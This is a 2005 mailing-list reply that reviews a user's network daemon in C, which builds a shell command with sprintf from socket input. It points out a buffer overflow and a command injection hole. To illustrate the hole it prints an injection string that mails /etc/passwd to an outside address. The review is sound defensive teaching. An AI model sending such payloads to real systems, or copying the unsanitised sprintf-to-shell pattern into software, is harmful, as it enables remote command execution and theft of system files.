Re: SOLVED: Daemon Programming
On Thu, Jan 13, 2005 at 09:41:29PM -0600, Sergio Cu?llar Vald?s wrote:
> Marc, thanks that was the problem !!!
> sprintf(message, "say -s 4 -a \"%s\"", buffer); < this was the big
> big big mistake
It certainly was.
> I added the hole path to the instructions:
> sprintf(message, "/usr/local/bin/say -s 4 -a \"%s\"", buffer);
> Thanks to all of you who helped me !! :-)
You deamonize. You open a socket. You read input from that
socket - carefully avoiding buffer overflows - then you run the
/usr/local/bin/say -s 4 -a "the text you read"
Firstly you don't avoid a simple buffer overflow. Although
you have two buffers, 'buffer' for receiving the message from
the network and 'message' for running the command are both the
same size you don't account for the extra characters when you're
sprintf(message, "say -s 4 -a \"%s\"", buffer);
At least change that to:
snprintf(message, sizeof(message) "say -s 4 -a \"%s\"", buffer);
Secondly, and this is the biggie, you don't quote or process the
characters which are read from the network.
Consider what would happen if a malicious user sent this:
"; cat /etc/passwd | mail email@example.com ; echo "
You would run this commend:
/usr/local/bin/say -s 4 -a ""; cat /etc/passwd | mail ... ; echo ""
Effectively you're allowing any user who can connect to your server
to execute arbitary commands. If this is started by init you're likely
running as root too.
Check that the characters you read from the network are only
[a-zA-Z ] and you're probably OK.
# The Debian Security Audit Project.